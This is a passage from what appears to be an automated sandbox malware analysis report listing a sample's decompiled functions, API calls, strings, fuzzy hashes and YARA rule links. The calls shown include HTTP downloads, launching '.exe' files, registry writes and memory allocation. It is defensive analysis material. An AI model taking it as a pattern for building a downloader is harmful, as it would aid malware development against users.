Instruction Fuzzy Hash: 7AC16B71A002189FEB25CF24CD85BEAB7B9FF48304F1041ADE509A76A1DB75AE84CF54

Function 0040EF0D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0040EF0C,00000000,7622DF80,?,00000000,?,004114AD), ref: 0040EF2F
TerminateProcess.KERNEL32(00000000,?,0040EF0C,00000000,7622DF80,?,00000000,?,004114AD), ref: 0040EF36
ExitProcess.KERNEL32 ref: 0040EF48

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
Instruction ID: d9b2d8b9480fbdfc0f40d30fbcce2ac7d268d3ffe56ae59340c1a79faed9bf6b
Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
Instruction Fuzzy Hash: 48E08C71400108BFCF117F26CC0898A3F28FB10341B004835F804AA232CB39DD92CB58

Function 04D50950 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 735COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=
API String ID: 0-322501076
Opcode ID: 59db30d6895fca3b9aaf1f5b31d4863abde41cd0604b7fea23cdba89a09bf587
Instruction ID: e9496b9989dea828b8b58fd96f560483e30063728c6d18238d865458bf952d6b
Opcode Fuzzy Hash: 59db30d6895fca3b9aaf1f5b31d4863abde41cd0604b7fea23cdba89a09bf587
Instruction Fuzzy Hash: 6EE1D4EB74C211BD7A0385456B54AFB67ADE6C67303308427FC87C6622FA94EE496131

Function 00D39F7E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00D39FA6
Module32First.KERNEL32(00000000,00000224), ref: 00D39FC6

Memory Dump Source

Source File: 00000000.00000002.3071582950.0000000000D39000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D39000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d39000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: adeb08442354583404bb3ce99516768792c7aa7b15249afb28578eb06ff176f1
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E8F096322007146FD7203BF9989DBAEF7E8AF49724F140528E642D14C0DBF4EC454A71

Function 00408020 Relevance: 2.5, Strings: 2, Instructions: 27COMMON

Download Yara Rule

Strings

mixtwo, xrefs: 0040805C
emp, xrefs: 00408037

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: Sleep
String ID: emp$mixtwo
API String ID: 3472027048-2390925073
Opcode ID: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
Instruction ID: 72a2dd17e89226f8ccca0b0bb08db3f26db736a0bfe45ababc36bb360cb4900e
Opcode Fuzzy Hash: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
Instruction Fuzzy Hash: 7BF08CB160130457E710BF24ED1B71A3EA4970275CFA006ADDC601F2D2E7FB821A97EA

Function 00A9F7DE Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?), ref: 00A9F887

Memory Dump Source

Source File: 00000000.00000002.3069516453.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9f000_WwVs3PavPg.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 82655837fe9515056e133dc657adcac6cf79e103b72a9eb64f4d7841888e30b8
Instruction ID: 0bf7b0c8c334bd8b8b6ac59852bbfde8bef57c2b77591266d398d723bb35c32a
Opcode Fuzzy Hash: 82655837fe9515056e133dc657adcac6cf79e103b72a9eb64f4d7841888e30b8
Instruction Fuzzy Hash: 2401CB363182982FEF00CF708951BEF3BA0DFC9310F288165ED44C7862826A8C06C758

Function 004055C0 Relevance: 27.3, APIs: 5, Strings: 10, Instructions: 1092
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000005DC,?,7712D120), ref: 00405620
__Init_thread_footer.LIBCMT ref: 00405847
Sleep.KERNEL32(00000BB8,00000000,?,0042B77C,0042B92C,0042B92D,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 00405A4A

Part of subcall function 00406550: __Init_thread_footer.LIBCMT ref: 004065B9

Part of subcall function 004065E0: __Init_thread_footer.LIBCMT ref: 0040663A

Part of subcall function 00407C30: __Init_thread_footer.LIBCMT ref: 00407C99

Part of subcall function 00407BB0: __Init_thread_footer.LIBCMT ref: 00407C09

Part of subcall function 00407B10: __Init_thread_footer.LIBCMT ref: 00407B8D

Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,004272E8,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 004062DE
Sleep.KERNEL32(00000BB8,00000000,00000000,004272E8), ref: 004063DD

Part of subcall function 00407FA0: __Init_thread_footer.LIBCMT ref: 00407FF9

Part of subcall function 00407F20: __Init_thread_footer.LIBCMT ref: 00407F79

Part of subcall function 00407EC0: __Init_thread_footer.LIBCMT ref: 00407F11

Part of subcall function 004055C0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405493
Part of subcall function 004055C0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004054B5
Part of subcall function 004055C0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004054DD
Part of subcall function 004055C0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054E6

Strings

^OX*, xrefs: 004046E8
viFO, xrefs: 00404537
updateSW, xrefs: 004051E8
mixone, xrefs: 00405ADF
Q)9, xrefs: 004056F8
SUB=, xrefs: 00405632
DFEK, xrefs: 00404EDC
KDOX, xrefs: 00404541
get, xrefs: 0040575C
]DFE, xrefs: 0040428D

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: Init_thread_footer$Sleep$CloseCreateOpenValue
String ID: DFEK$KDOX$Q)9$SUB=$]DFE$^OX*$get$mixone$updateSW$viFO
API String ID: 2078494684-1136066708
Opcode ID: 6cc127e7e3ac2c726d6a27f0abac17a1d82dad36900cdcac998fe1a0d29d4f20
Instruction ID: f649a411d8851b1a91c0a488fce11130e3673d7bad0c40fe0d5f826dd2b8960c
Opcode Fuzzy Hash: 6cc127e7e3ac2c726d6a27f0abac17a1d82dad36900cdcac998fe1a0d29d4f20
Instruction Fuzzy Hash: 3F82AF71D001049ADB14FBB5C95ABEEB3789F14308F5081BEF412771D2EF786A49CAA9

Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 1000152A
__cftof.LIBCMT ref: 10001624
InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
InternetCloseHandle.WININET(00000000), ref: 100016E0
InternetCloseHandle.WININET(00000000), ref: 100016E3
InternetCloseHandle.WININET(00000000), ref: 100016E9

Strings

http://, xrefs: 10001567
GET, xrefs: 100016AA

Memory Dump Source

Source File: 00000000.00000002.3075765310.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3075732775.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3075798355.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3075822200.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_WwVs3PavPg.jbxd

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
String ID: GET$http://
API String ID: 1233269984-1632879366
Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

Function 00401740 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 103
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017B7
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017DD

Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 004025A3

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401803
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401829

Strings

Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401779
GET, xrefs: 00401F81
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017E1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401807
text, xrefs: 00401B5C
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004017BB

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: HeadersHttpRequest$Concurrency::cancel_current_task
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
API String ID: 2146599340-3782612381
Opcode ID: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
Instruction ID: 9ba0ec624b0ce2a87a65cb7bdca14d25b7083be08071b54b776f69b68f7f070f
Opcode Fuzzy Hash: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
Instruction Fuzzy Hash: 34316171E00108EBDB14DFA9DC85FEEBBB9EB48714F60812AE121771C0C778A644CBA5

Function 04B4003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B4024D

Strings

kernel32.dll, xrefs: 04B4008F, 04B40095
cess, xrefs: 04B4018D

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: aaf139267ef4e5642fbb18c39f388347c894ce93ea4240f5c082b251081cc81f
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: EB527974A01229DFDB64CF68C984BACBBB1BF49304F1480D9E94DAB351DB30AA85DF15

Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264
networkcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 1000117F
InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA

Strings

text, xrefs: 10001327

Memory Dump Source

Source File: 00000000.00000002.3075765310.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3075732775.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3075798355.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3075822200.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_WwVs3PavPg.jbxd

Similarity

API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
String ID: text
API String ID: 1154000607-999008199
Opcode ID: 5bb6c959c08c52f1deca969ff5d7f0342f658ad243dbff8a6426dbc5f8fc3103
Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
Opcode Fuzzy Hash: 5bb6c959c08c52f1deca969ff5d7f0342f658ad243dbff8a6426dbc5f8fc3103
Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90

Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A

CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155

Strings

open, xrefs: 1000214F
.exe, xrefs: 1000206B

Memory Dump Source

Source File: 00000000.00000002.3075765310.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3075732775.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3075798355.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3075822200.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_WwVs3PavPg.jbxd

Similarity

API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: .exe$open
API String ID: 1627157292-49952409
Opcode ID: fecaffcc8a5dd3a535f99b20f533ad3ad145e7b685b1384be33c82bc1a84d92d
Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
Opcode Fuzzy Hash: fecaffcc8a5dd3a535f99b20f533ad3ad145e7b685b1384be33c82bc1a84d92d
Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

Function 04D5037F Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 1091
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 494bb9279beffb95d3947535fcccb9d9018d7725dc76792bb739d9fd996cc1ae
Instruction ID: 0c5c22b20164a43d9bd93a54d5573b878a16b1a71b31eb5bfeefde5e66476f43
Opcode Fuzzy Hash: 494bb9279beffb95d3947535fcccb9d9018d7725dc76792bb739d9fd996cc1ae
Instruction Fuzzy Hash: 1732F7EB30C210BD7A4385456B54AF76BADE6C7730330842BFC87D6622FA94EE496531

Function 04D50470 Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 1021
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: ebfc6d7fffa9f4c00a79148493cc0bfd517636411ceec92fbfa8c56d8280fc6b
Instruction ID: c4f17fd072e7d55542e210225889018f26868140d102033eaafc1639eab93b83
Opcode Fuzzy Hash: ebfc6d7fffa9f4c00a79148493cc0bfd517636411ceec92fbfa8c56d8280fc6b
Instruction Fuzzy Hash: 1822E5EB30C210BD7A4385456B54AF76BADE6C7730330842BFC87D6A12FA94EE496531

Function 04D50485 Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 1009
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: b68e3d4d0c5a1e4bdfabfceca91e0eb7e70e0eb92ffddd5e89d6f507f30c1ca1
Instruction ID: 52b4dc845b5a6be32dc6a6b491ab714a0ee2e0edcad1476852c36ba476a6a096
Opcode Fuzzy Hash: b68e3d4d0c5a1e4bdfabfceca91e0eb7e70e0eb92ffddd5e89d6f507f30c1ca1
Instruction Fuzzy Hash: 1122E5EB30C210BD7A4385456B54AF76BADE6C7730330842BFC87D6A12FA94EE496531

Function 04D504B1 Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 1009
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: c8093b92225aee1c47947e990a303c947db0e0192410afdfdc4fcf82668163bb
Instruction ID: 2161b9a10e5f84c7969e2e2b88ac08a05979afbb12223966d0d724e2032e476f
Opcode Fuzzy Hash: c8093b92225aee1c47947e990a303c947db0e0192410afdfdc4fcf82668163bb
Instruction Fuzzy Hash: 9122F6EB30C210BD7A4385456B54AF76BAEE6C7730330842BFC87D6612FA94EE496531

Function 04D5049D Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 1003
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: c75b4c93aa87fd646f7283627883732987cd8a67077ed330288688f5bfd95b32
Instruction ID: edcb795b3000f50215372f9aa23eb1ba69bbaacf3993ff83b1515f7dc00094ab
Opcode Fuzzy Hash: c75b4c93aa87fd646f7283627883732987cd8a67077ed330288688f5bfd95b32
Instruction Fuzzy Hash: FD22F5EB30C210BD7A4385456B54AF76BAEE6C7730330842AFC87D6612FA94EE496531

Function 04D504CB Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 992COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 2f79701f89cb404fe49d061b87b8dd37e8861b9a90e65674abc7999ccb12fc62
Instruction ID: 8400ae0d7b21af0f4d9d21d6c3fa0178539b85790cfc101a18baebcb67bed3e5
Opcode Fuzzy Hash: 2f79701f89cb404fe49d061b87b8dd37e8861b9a90e65674abc7999ccb12fc62
Instruction Fuzzy Hash: EE22E6EB30C210BD7A4385456B54AF76BADE6C7730330842BFC87D6A12FA94EE496531

Function 04D50569 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 981COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 84cfd41021c97f135bdc80d457544dd335fd98e96aa780d0dd867f6b9313ce31
Instruction ID: 773f27f55c876f8163758c6afe686ddfa6fd3707fe943bacff73ebd98b209e56
Opcode Fuzzy Hash: 84cfd41021c97f135bdc80d457544dd335fd98e96aa780d0dd867f6b9313ce31
Instruction Fuzzy Hash: 3812F7EB30C210BD7A4385456B54AF76BADE6C7730330842BFC87D6A12FA94EE496531

Function 04D504F2 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 975COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 09dcf231577770ee26dccef4ec9897b42d3ada8c495ccb833290c20a28515dc2
Instruction ID: a1eec7e3cfd1463bb04a2af5565a2dbc680f8f4165fdbe1da4f42db9057a1ccd
Opcode Fuzzy Hash: 09dcf231577770ee26dccef4ec9897b42d3ada8c495ccb833290c20a28515dc2
Instruction Fuzzy Hash: 3812E6EB30C210BD7A4385456B54AF76BAEE6C7730330842AFC87D6612FA94EE496531

Function 04D50510 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 970COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: c8e42631fc0c303caf6e17564a5889a90dc76537985455049a07d7f2c46ee265
Instruction ID: fecaf2a9ea0b74ed25a071602f5227824706f2b33d0a97111ad5d30073395e02
Opcode Fuzzy Hash: c8e42631fc0c303caf6e17564a5889a90dc76537985455049a07d7f2c46ee265
Instruction Fuzzy Hash: 6612F7EB30C210BD7A4385456B54AF76BAEE6C7730330842BFC87D6612FA94EE496531

Function 04D50598 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 942COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 6e317ed1943ca211409f017cb8e50ad4d884ab63298d16ce52a84d18e1b83435
Instruction ID: 5aaf7cef3cffb5804030d732654dff785f3e6a33db38d0cd1d4a5f2cdd538598
Opcode Fuzzy Hash: 6e317ed1943ca211409f017cb8e50ad4d884ab63298d16ce52a84d18e1b83435
Instruction Fuzzy Hash: 5712E6EB30C210BD7A4385456B54AF76BAEE6C77303308427FC87D6622FA94EE496531

Function 04D5055B Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 942COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: f707b2900c56f9d140f6910ced429a503cbf25588a6b6cb4d8d82beb1f51dec9
Instruction ID: dc8ff740b6aefbe99cbbadc7249ecc84e7593d2e160599b57fe48cfb4df0ce88
Opcode Fuzzy Hash: f707b2900c56f9d140f6910ced429a503cbf25588a6b6cb4d8d82beb1f51dec9
Instruction Fuzzy Hash: 7812E7EB30C210BD7A4385456B54AF76BAEE6C77303308427FC87D6622FA94EE496531

Function 04D50583 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 940COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: a32b5b4970e223ebf9c36510f79de2b9d430ddf6f83f4018054331a955e0d268
Instruction ID: 9b0433afed77416b15646f5229e5e7477f8ce4bc6bcfc2b158c8c9dee7e100d4
Opcode Fuzzy Hash: a32b5b4970e223ebf9c36510f79de2b9d430ddf6f83f4018054331a955e0d268
Instruction Fuzzy Hash: 7C12D5EB30C210BD7A4385456B54AF76BAEE6C77303308427FC87D6612FA94EE496531

Function 04D505A8 Relevance: 6.2, APIs: 1, Strings: 2, Instructions: 935COMMON

Download Yara Rule

Strings

Z*n=, xrefs: 04D50A1D
.ZY, xrefs: 04D508C7

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID: Z*n=$.ZY
API String ID: 0-3806278129
Opcode ID: 7c0ed49c204ae862fb8d8eb63a7236c643ea1319cef2b24d1e8a63911a8e632c
Instruction ID: 2b0ca83732d8a80be6b5bfe80cff0c8eff2ec1e21aee64cace4235ce832ee055
Opcode Fuzzy Hash: 7c0ed49c204ae862fb8d8eb63a7236c643ea1319cef2b24d1e8a63911a8e632c
